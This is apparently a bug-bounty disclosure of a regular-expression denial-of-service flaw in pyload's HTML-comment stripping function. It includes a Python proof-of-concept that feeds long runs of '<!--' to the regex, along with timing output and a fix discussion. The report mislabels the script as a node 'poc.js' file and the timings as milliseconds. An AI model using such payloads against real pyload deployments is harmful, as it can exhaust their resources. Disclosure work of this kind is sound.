Inefficient Regular Expression Complexity in pyload/pyload
Reported on
Sep 20th 2021
✍️ Description
The pyload package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide crafted HTML comments as input to the comments function of utils/web/purge.py may cause an application to consume an excessive amount of CPU.
Below pinned line using vulnerable regex.
🕵️♂️ Proof of Concept
Reproducer where we’ve copied the relevant code:
https://github.com/pyload/pyload/blob/127beb0ea3b9c9c23991cbde7d83dc9d892d2d5c/src/pyload/core/utils/web/purge.py#L7 https://github.com/pyload/pyload/blob/127beb0ea3b9c9c23991cbde7d83dc9d892d2d5c/src/pyload/core/utils/web/purge.py#L12-L14
Put the below in a poc.js file and run with node
import time
import re
_RE_COMMENTS = re.compile(r"<!--.*?-->", flags=re.S)
def comments(value):
"""Removes HTML comments from a text string."""
return _RE_COMMENTS.sub("", value).strip()
for i in range(1, 50000):
start_time = time.perf_counter()
payload = ""+"<!--"*(i*10000)+"-"
comments(payload)
stop_time = time.perf_counter() - start_time
print("Payload.length: " + str(len(payload)) + ": " + str(stop_time) + " ms")
Check the Output:
Payload.length: 40001: 2.9121267 ms
Payload.length: 80001: 10.2797351 ms
Payload.length: 120001: 27.080219800000002 ms
Payload.length: 160001: 45.3576031 ms
Payload.length: 200001: 66.31825060000001 ms
--
--
💥 Impact
This vulnerability is capable of exhausting system resources and leads to crashes.
Occurrences
SECURITY.md
2 years ago
Hello, I got your email, How do you suggest to fix this issue?
@maintainer Submitted a patch.
Please validate this issue using Mark as valid and also please confirm the fix once it got merged.
You can select my branch fix-redos.
@admin Can you please guide the maintainer?
@mainainer - please click the confirm fix button above, and follow the steps in the modal form.
When selecting who fixed the vulnerability, feel free to elect @ready-research.